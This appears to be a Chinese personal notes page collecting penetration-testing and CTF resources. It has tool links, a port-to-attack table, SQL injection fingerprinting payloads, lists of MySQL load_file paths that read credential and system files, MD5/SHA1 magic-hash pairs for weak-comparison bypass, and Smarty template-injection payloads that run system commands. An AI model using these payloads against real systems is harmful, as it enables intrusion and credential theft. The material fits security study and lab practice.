日常发布资源的地方
日常座右铭
即使再小的帆也能远航。
只要学不死,就往死里学!
真正的明白:知道老师要告诉我们什么,学完后能做什么事情
认认大神老师
B站狂神
目录
信息收集
网站DNS记录查询
靶场
docker搭建dvwa
上述搭建完成靶场后,使用下面语句运行即可 docker run -d -p 81:80 d9c
|
杂记
图标库==Win镜像下载==免费音乐站点推荐==PIP换源
Hack
红队兵工厂/武器库
棱角社区
渗透测试各个计算机系统的命令
渗透测试常用术语
ATTC&CK-专业名词阐释
反弹shell生成
查出对应域名相关的IP及地址
端口协议安全
fofa语法
源码收集-灰
https://www.huzhan.com/
https://28xin.com/
https://bbs.bcb5.com/
https://www.shixinwl.com/
https://www.lengcat.com/
https://www.xlymz.com/
https://www.ymadx.com/
黑暗引擎:
https://fofa.so
https://quake.360.cn
https://www.shodan.io
https://www.zoomeye.org
自动项目:
https://github.com/knownsec/Kunyu
https://github.com/0x727/ShuiZe_0x727
https://github.com/TophantTechnology/ARL
相关资源:
https://forum.ywhack.com/center.php
解密相关资源
https://www.cmd5.com http://tmxk.org/jother http://www.jsfuck.com http://www.hiencode.com http://tool.chacuo.net/cryptaes https://utf-8.jp/public/aaencode.html https://github.com/guyoung/CaptfEncoder
|
密码学
CTF密码学常见加密解密总结
CTF中常见密码题解密网站总结(建议收藏)
JS方括号括号特殊字符加密解密
CTF在线工具
md5加密解密工具
各种各样的加密解密工具
颜文字加密解密1颜文字加密解密2
30余种加密编码类型的密文特征分析(建议收藏)
Web安全
B站大佬解OSCP
信息收集
DNS域名解析
超级ping网站:获取最近的CDN节点。
各地ping—-国外ping–国外获取真实IP地址的站点(不一定正确)—全网扫描
本机IP地址查询以及出网IP地址查询—旁注查询—IP地址反查
TCPdump-抓包相关
常见端口渗透–端口渗透测试总结
看图识WAF
绕过CDN总结–绕过CDN方法2
免费IP代理池
万能密码大全
sqlmap用户手册
转自:https: SQL注入之注入点判断数据库类型 0x01:MSSQL ID=1and(selectcount(*)fromsysobjects)>0返回正常 ID=1and(selectcount(*)frommsysobjects)>0返回异常 ID=1andleft(version(),1)=5%23 ID=1andexists(selectidfromsysobjects) ID=1andlength(user)>0 ID=1CHAR(97) +CHAR(110) +CHAR(100) +CHAR(32) +CHAR(49) +CHAR(61) +CHAR(49)
0x02:ACCESS ID=1and(selectcount(*)fromsysobjects)>0返回异常 ID=1and(selectcount(*)frommsysobjects)>0返回异常
0x03:MYSQL id=2andversion()>0返回正常 id=2andlength(user())>0 id=2CHAR(97,110,100,32,49,61,49)
0x04:ORACLE ID=1and'1'||'1'='11 ID=1and0<>(selectcount(*)fromdual) ID=1CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
0x05:其他方法 “/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符: “--”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符: “;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
|
常见端口和服务
端口 |
说明 |
攻击方法 |
21 |
FTP-文件传输协议 |
弱口令、爆破、嗅探、后门 |
22 |
ssh-安全隧道远程登陆 |
弱口令、爆破 |
23 |
telnet-远程连接 |
弱口令、爆破、嗅探 |
25 |
smtp-简单邮件传输协议 |
邮件伪造 |
53 |
domain-DNS域名解析服务 |
DNS劫持、缓存投毒 |
80/443 |
http服务 |
常见Web漏洞、IIS写文件、OpenSSL |
139 |
Samba服务 |
爆破、远程代码执行 |
445 |
局域网共享 |
ms-17010漏洞(Win7及之前版本) |
873 |
Rsync |
远程代码执行 |
1433 |
MSSQL数据库 |
爆破、SQL注入 |
2049 |
NFS |
未授权访问 |
3306 |
MySQL数据库 |
爆破、SQL注入 |
3389 |
rdp-远程桌面连接 |
爆破、漏洞ms12-020等 |
5432 |
postgresql |
爆破、注入 |
5632 |
Pcanywhere |
拒绝服务等漏洞、爆破 |
5900 |
VNC远程登陆 |
爆破、认证绕过 |
6379 |
Redis |
未授权访问 |
7001/7002 |
weblogic |
Java反序列化漏洞 |
9990 |
jboss |
远程代码执行、Java反序列化 |
代码审计
红日安全-PHP
数据库load_file()读取操作
突破secure-file-priv写shell
SQL注入
load_file 常用路径信息(套用他人博客的)
WINDOWS下: c:/boot.ini c:/windows/php.ini c:/windows/my.ini c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini c:\Program Files\Serv-U\ServUDaemon.ini c:\windows\system32\inetsrv\MetaBase.xml c:\windows\repair\sam c:\Program Files\ Serv-U\ServUAdmin.exe c:\Program Files\RhinoSoft.com\ServUDaemon.exe C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf c:/Resin-3.0.14/conf/resin.conf c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机 d:\APACHE\Apache2\conf\httpd.conf C:\Program Files\mysql\my.ini c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置 C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
LUNIX/UNIX 下:
/usr/local/app/apache2/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf /usr/local/app/php5/lib/php.ini /etc/sysconfig/iptables /etc/httpd/conf/httpd.conf /etc/rsyncd.conf /etc/my.cnf /etc/redhat-release /etc/issue /etc/issue.net /usr/local/app/php5/lib/php.ini /usr/local/app/apache2/conf/extra/httpd-vhosts.conf /etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看 /etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf 查看linux APACHE虚拟主机配置文件 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上 /usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看 /etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0×2F6574632F706173737764),0×3c,0×20) replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
|
工具
Masscan:端口扫描,应用协议
Wafw00f:Web应用防护防火墙识别
Nmap:端口扫描,应用协议,防火墙识别
搭建XSS平台
搭建XSS平台的方法2
指纹识别
云悉指纹识别
CMS中间件指纹识别库
漏洞
flash框架漏洞
XSS跨站脚本攻击
Referer漏洞攻击汇总
渗透测试之中间件安全
Linux关机:poweroff
字典
md5为0e开头的小字典如下
具体看这篇博客
简单来说就是哈希值为0
md5加密明文获得0e开头密文&md5弱类型对比绕过
弱类型比较,注意了。
明文 密文 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s1885207154a 0e509367213418206700842008763514 s1502113478a 0e861580163291561247404381396064 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s155964671a 0e342768416822451524974117254469 s1184209335a 0e072485820392773389523109082030 s1665632922a 0e731198061491163073197128363787 s1502113478a 0e861580163291561247404381396064 s1836677006a 0e481036490867661113260034900752 s1091221200a 0e940624217856561557816327384675 s155964671a 0e342768416822451524974117254469 s1502113478a 0e861580163291561247404381396064 s155964671a 0e342768416822451524974117254469 s1665632922a 0e731198061491163073197128363787 s155964671a 0e342768416822451524974117254469 s1091221200a 0e940624217856561557816327384675 s1836677006a 0e481036490867661113260034900752 s1885207154a 0e509367213418206700842008763514 s532378020a 0e220463095855511507588041205815 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s214587387a 0e848240448830537924465865611904 s1502113478a 0e861580163291561247404381396064 s1091221200a 0e940624217856561557816327384675 s1665632922a 0e731198061491163073197128363787 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s1665632922a 0e731198061491163073197128363787 s878926199a 0e545993274517709034328855841020
|
sha1加密明文获得0e开头密文
aaroZmOk 0e66507019969427134894567494305185566735 aaK1STfY 0e76658526655756207688271159624026011393 aaO8zKZF 0e89257456677279068558073954252716165668 aa3OFF9m 0e36977786278517984959260394024281014729 0e1290633704 0e19985187802402577070739524195726831799 10932435112 0e07766915004133176347055865026311692244
|
模板注入
smarty模板注入漏洞
常用payload {if phpinfo()}{/if} {if passthru("cat /flag")}{/if} {if system('ls')}{/if} {if readfile('/flag')}{/if} {if show_source('/flag')}{/if} {if system('cat ../../../flag')}{/if} smarty中的{if}标签中可以执行php语句
|
模板注入漏洞汇总-博客